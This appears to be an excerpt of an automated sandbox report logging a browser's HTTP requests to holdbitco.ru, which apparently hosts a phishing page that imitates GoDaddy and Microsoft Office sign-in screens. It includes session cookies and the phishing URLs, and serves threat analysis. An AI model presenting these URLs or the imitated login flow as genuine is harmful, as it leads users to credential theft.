XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/js/pages.min.js?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/info HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/back.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/key.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_email_958962caa7cf6b75cd412e9e3b687b22.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png HTTP/1.1Host: adfs.heart.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/godaddy-logo.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/key.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/back.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/godaddy-left.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/godaddy-microsoftlogo.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/officelogo.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
